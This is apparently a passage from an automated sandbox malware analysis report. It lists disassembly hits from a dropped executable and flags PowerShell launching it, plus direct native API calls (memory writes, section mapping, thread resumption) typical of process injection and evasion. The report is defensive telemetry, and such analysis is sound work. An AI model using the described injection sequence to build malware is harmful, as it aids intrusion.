            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AF950 mov eax, dword ptr fs:[00000030h]6_2_1F7AF950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AF950 mov eax, dword ptr fs:[00000030h]6_2_1F7AF950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B9950 mov eax, dword ptr fs:[00000030h]6_2_1F7B9950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B9950 mov eax, dword ptr fs:[00000030h]6_2_1F7B9950
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8779BC mov eax, dword ptr fs:[00000030h]6_2_1F8779BC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8779BC mov ecx, dword ptr fs:[00000030h]6_2_1F8779BC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8779BC mov eax, dword ptr fs:[00000030h]6_2_1F8779BC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B9DF mov eax, dword ptr fs:[00000030h]6_2_1F87B9DF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B9DF mov eax, dword ptr fs:[00000030h]6_2_1F87B9DF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CB919 mov eax, dword ptr fs:[00000030h]6_2_1F7CB919
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F910 mov eax, dword ptr fs:[00000030h]6_2_1F79F910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85B9EE mov eax, dword ptr fs:[00000030h]6_2_1F85B9EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85B9EE mov ecx, dword ptr fs:[00000030h]6_2_1F85B9EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85B9EE mov eax, dword ptr fs:[00000030h]6_2_1F85B9EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]6_2_1F8219EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]6_2_1F8219EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8219EE mov eax, dword ptr fs:[00000030h]6_2_1F8219EE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F845910 mov eax, dword ptr fs:[00000030h]6_2_1F845910
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov esi, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD9D0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD9D0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F855930 mov eax, dword ptr fs:[00000030h]6_2_1F855930
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F855930 mov ecx, dword ptr fs:[00000030h]6_2_1F855930
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A59C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A59C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A59C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A59C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A59C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A99BE mov eax, dword ptr fs:[00000030h]6_2_1F7A99BE
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82B953 mov eax, dword ptr fs:[00000030h]6_2_1F82B953
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F825960 mov eax, dword ptr fs:[00000030h]6_2_1F825960
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B991 mov eax, dword ptr fs:[00000030h]6_2_1F79B991
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B991 mov eax, dword ptr fs:[00000030h]6_2_1F79B991
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F97D mov eax, dword ptr fs:[00000030h]6_2_1F85F97D
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79D878 mov eax, dword ptr fs:[00000030h]6_2_1F79D878
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1876 mov eax, dword ptr fs:[00000030h]6_2_1F7D1876
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D1876 mov eax, dword ptr fs:[00000030h]6_2_1F7D1876
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F889 mov eax, dword ptr fs:[00000030h]6_2_1F85F889
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F83B890 mov eax, dword ptr fs:[00000030h]6_2_1F83B890
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F83B890 mov eax, dword ptr fs:[00000030h]6_2_1F83B890
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79D860 mov eax, dword ptr fs:[00000030h]6_2_1F79D860
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85D8B0 mov eax, dword ptr fs:[00000030h]6_2_1F85D8B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85D8B0 mov eax, dword ptr fs:[00000030h]6_2_1F85D8B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7E1843 mov eax, dword ptr fs:[00000030h]6_2_1F7E1843
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D182A mov eax, dword ptr fs:[00000030h]6_2_1F7D182A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D3820 mov eax, dword ptr fs:[00000030h]6_2_1F7D3820
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8298E7 mov eax, dword ptr fs:[00000030h]6_2_1F8298E7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F8F8 mov eax, dword ptr fs:[00000030h]6_2_1F85F8F8
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7C9803 mov eax, dword ptr fs:[00000030h]6_2_1F7C9803
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F841800 mov eax, dword ptr fs:[00000030h]6_2_1F841800
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F841800 mov eax, dword ptr fs:[00000030h]6_2_1F841800
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F80A mov eax, dword ptr fs:[00000030h]6_2_1F85F80A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]6_2_1F7B38E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]6_2_1F7B38E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7B38E0 mov eax, dword ptr fs:[00000030h]6_2_1F7B38E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82D820 mov ecx, dword ptr fs:[00000030h]6_2_1F82D820
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82D820 mov eax, dword ptr fs:[00000030h]6_2_1F82D820
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82D820 mov eax, dword ptr fs:[00000030h]6_2_1F82D820
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A78D9 mov eax, dword ptr fs:[00000030h]6_2_1F7A78D9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A78D9 mov eax, dword ptr fs:[00000030h]6_2_1F7A78D9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A38C4 mov eax, dword ptr fs:[00000030h]6_2_1F7A38C4
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F78A mov eax, dword ptr fs:[00000030h]6_2_1F85F78A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]6_2_1F79B765
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]6_2_1F79B765
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]6_2_1F79B765
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79B765 mov eax, dword ptr fs:[00000030h]6_2_1F79B765
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8297A9 mov eax, dword ptr fs:[00000030h]6_2_1F8297A9
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]6_2_1F82F7AF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]6_2_1F82F7AF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]6_2_1F82F7AF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]6_2_1F82F7AF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82F7AF mov eax, dword ptr fs:[00000030h]6_2_1F82F7AF
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8737B6 mov eax, dword ptr fs:[00000030h]6_2_1F8737B6
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85D7B0 mov eax, dword ptr fs:[00000030h]6_2_1F85D7B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85D7B0 mov eax, dword ptr fs:[00000030h]6_2_1F85D7B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A973A mov eax, dword ptr fs:[00000030h]6_2_1F7A973A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A973A mov eax, dword ptr fs:[00000030h]6_2_1F7A973A
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799730 mov eax, dword ptr fs:[00000030h]6_2_1F799730
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F799730 mov eax, dword ptr fs:[00000030h]6_2_1F799730
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D5734 mov eax, dword ptr fs:[00000030h]6_2_1F7D5734
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3720 mov eax, dword ptr fs:[00000030h]6_2_1F7A3720
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]6_2_1F7BF720
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]6_2_1F7BF720
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7BF720 mov eax, dword ptr fs:[00000030h]6_2_1F7BF720
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DF71F mov eax, dword ptr fs:[00000030h]6_2_1F7DF71F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7DF71F mov eax, dword ptr fs:[00000030h]6_2_1F7DF71F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A5702 mov eax, dword ptr fs:[00000030h]6_2_1F7A5702
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A5702 mov eax, dword ptr fs:[00000030h]6_2_1F7A5702
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A7703 mov eax, dword ptr fs:[00000030h]6_2_1F7A7703
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7AD7E0 mov ecx, dword ptr fs:[00000030h]6_2_1F7AD7E0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F72E mov eax, dword ptr fs:[00000030h]6_2_1F85F72E
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F86972B mov eax, dword ptr fs:[00000030h]6_2_1F86972B
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A57C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A57C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A57C0 mov eax, dword ptr fs:[00000030h]6_2_1F7A57C0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]6_2_1F87B73C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]6_2_1F87B73C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]6_2_1F87B73C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F87B73C mov eax, dword ptr fs:[00000030h]6_2_1F87B73C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F7BA mov eax, dword ptr fs:[00000030h]6_2_1F79F7BA
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7CD7B0 mov eax, dword ptr fs:[00000030h]6_2_1F7CD7B0
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F873749 mov eax, dword ptr fs:[00000030h]6_2_1F873749
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]6_2_1F84375F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]6_2_1F84375F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]6_2_1F84375F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]6_2_1F84375F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F84375F mov eax, dword ptr fs:[00000030h]6_2_1F84375F
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]6_2_1F82368C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]6_2_1F82368C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]6_2_1F82368C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F82368C mov eax, dword ptr fs:[00000030h]6_2_1F82368C
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9660 mov eax, dword ptr fs:[00000030h]6_2_1F7D9660
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7D9660 mov eax, dword ptr fs:[00000030h]6_2_1F7D9660
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F85F6C7 mov eax, dword ptr fs:[00000030h]6_2_1F85F6C7
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]6_2_1F8616CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]6_2_1F8616CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]6_2_1F8616CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F8616CC mov eax, dword ptr fs:[00000030h]6_2_1F8616CC
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F79F626 mov eax, dword ptr fs:[00000030h]6_2_1F79F626
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeCode function: 6_2_1F7A3616 mov eax, dword ptr fs:[00000030h]6_2_1F7A3616
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
